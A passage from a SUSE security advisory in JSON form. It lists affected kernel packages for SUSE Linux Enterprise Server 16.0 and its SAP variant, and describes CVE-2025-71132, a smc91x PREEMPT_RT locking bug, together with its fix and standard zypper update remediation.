"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71131"
},
{
"cve": "CVE-2025-71132",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71132"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc91x: fix broken irq-context in PREEMPT_RT\n\nWhen smc91x.c is built with PREEMPT_RT, the following splat occurs\nin FVP_RevC:\n\n[ 13.055000] smc91x LNRO0003:00 eth0: link up, 10Mbps, half-duplex, lpa 0x0000\n[ 13.062137] BUG: workqueue leaked atomic, lock or RCU: kworker/2:1[106]\n[ 13.062137] preempt=0x00000000 lock=0-\u003e0 RCU=0-\u003e1 workfn=mld_ifc_work\n[ 13.062266] C\n** replaying previous printk message **\n[ 13.062266] CPU: 2 UID: 0 PID: 106 Comm: kworker/2:1 Not tainted 6.18.0-dirty #179 PREEMPT_{RT,(full)}\n[ 13.062353] Hardware name: , BIOS\n[ 13.062382] Workqueue: mld mld_ifc_work\n[ 13.062469] Call trace:\n[ 13.062494] show_stack+0x24/0x40 (C)\n[ 13.062602] __dump_stack+0x28/0x48\n[ 13.062710] dump_stack_lvl+0x7c/0xb0\n[ 13.062818] dump_stack+0x18/0x34\n[ 13.062926] process_scheduled_works+0x294/0x450\n[ 13.063043] worker_thread+0x260/0x3d8\n[ 13.063124] kthread+0x1c4/0x228\n[ 13.063235] ret_from_fork+0x10/0x20\n\nThis happens because smc_special_trylock() disables IRQs even on PREEMPT_RT,\nbut smc_special_unlock() does not restore IRQs on PREEMPT_RT.\nThe reason is that smc_special_unlock() calls spin_unlock_irqrestore(),\nand rcu_read_unlock_bh() in __dev_queue_xmit() cannot invoke\nrcu_read_unlock() through __local_bh_enable_ip() when current-\u003esoftirq_disable_cnt becomes zero.\n\nTo address this issue, replace smc_special_trylock() with spin_trylock_irqsave().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71132",
"url": "https://www.suse.com/security/cve/CVE-2025-71132"
},
{
"category": "external",
"summary": "SUSE Bug 1256737 for CVE-2025-71132",
"url": "https://bugzilla.suse.com/1256737"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
